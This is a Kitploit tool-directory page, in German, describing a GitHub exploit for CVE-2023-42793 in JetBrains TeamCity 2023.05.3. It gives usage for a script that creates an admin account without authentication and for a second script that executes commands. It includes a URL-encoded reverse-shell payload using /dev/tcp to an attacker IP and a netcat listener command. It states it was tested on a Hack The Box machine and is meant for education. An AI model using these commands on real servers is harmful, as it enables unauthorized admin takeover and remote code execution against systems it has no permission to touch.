Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793 | Kitploit
Tools/GitHubGitHub/b4l3ri0n/cve-2023-42793
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793

Repository anzeigen
113vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2023-42793 - TeamCity Admin Account Creation führt zu RCE

Verwende zuerst exploit.py, um ein Administratorkonto zu erstellen, und verwende dann rce.py, um Befehle auf dem Ziel auszuführen. Für eine Reverse Shell siehe hier

Exploit-Skript

Beschreibung

Dieses Skript nutzt CVE-2023-42793 aus, um ein Administratorkonto auf einem TeamCity-Server zu erstellen. Es sendet eine POST-Anfrage an die Ziel-URL, um einen Admin-Benutzer mit angegebenen oder zufälligen Anmeldedaten zu erstellen.

Verwendung

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Optionen

  • -u, --url URL: Ziel-URL (erforderlich)
  • -v, --verbose: Ausführlichen Modus aktivieren
  • -n, --username USERNAME: Benutzernamen angeben (Standard: zufällig)
  • -p, --password PASSWORD: Passwort angeben (Standard: zufällig)
  • -e, --email EMAIL: E-Mail angeben (Standard: zufällig)
  • -t, --token-file: Datei zum Speichern des Tokens

Voraussetzungen

  • Python 3.x
  • Python-Bibliotheken
    • Um die Abhängigkeiten zu installieren: pip3 install -r requirements.txt

Beispiele

  1. Exploit mit zufälligem Benutzernamen, Passwort und E-Mail:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. Exploit mit angegebenem Benutzernamen, Passwort und E-Mail:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

Ausgabe

Bei erfolgreicher Ausnutzung gibt das Skript die URL, den Benutzernamen und das Passwort des erstellten Administratorkontos aus und speichert die Ausgabe in der Token-Datei.

Remote Code Execution (RCE) Skript

Beschreibung

Dieses Skript ermöglicht die Ausführung von Befehlen auf einem anfälligen TeamCity-Server unter Ausnutzung von CVE-2023-42793. Es aktiviert zunächst die Debug-Prozesse und führt dann den angegebenen Befehl über die entsprechenden API-Endpunkte aus.

Verwendung

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Optionen

  • -u, --url URL : Ziel-URL (erforderlich)
  • -t, --token-file : Datei angeben, die das Token enthält
  • -c, --command COMMAND: Auszuführenden Befehl angeben (RCE)
  • -P, --port PORT: Port angeben (Standard ist 80)

Beispiel

Exploit mit einem angegebenen Befehl:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

Für Reverse Shell

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • Ersetze in diesem Befehl für die Reverse Shell {IP} durch deine IP und {port} durch den Port, auf dem du hörst.
  • Erstelle einen Listener mit nc, z.B. nc -nvlp 5555
  • Weitere Informationen unter revshells

Hinweise

  • Dieses Skript wurde auf Runner.htb von Hack The Box getestet
  • Dieses Skript dient nur zu Bildungszwecken.
  • Verwende es verantwortungsbewusst und nur auf Systemen, die du testen darfst.

Danksagungen

  • Zyad Elsayed
    • GitHub Repository: Zyad-Elsayed
    • LinkedIn account: zyad-abdelbary
  • Original-Exploit für das Administratorkonto: ByteHunter (Exploit-DB)

Ressourcen

  • CVE-2023-42793 Beschreibung: Offizielle Beschreibung der CVE-Schwachstelle.
  • Exploit Database Eintrag: Original-Exploit-Code auf Exploit Database.
  • TeamCity Blog: Blogbeitrag über die CVE-2023-42793-Schwachstelle in TeamCity.
  • TeamCity Dokumentation: Offizielle Dokumentation für TeamCity.
Tool herunterladen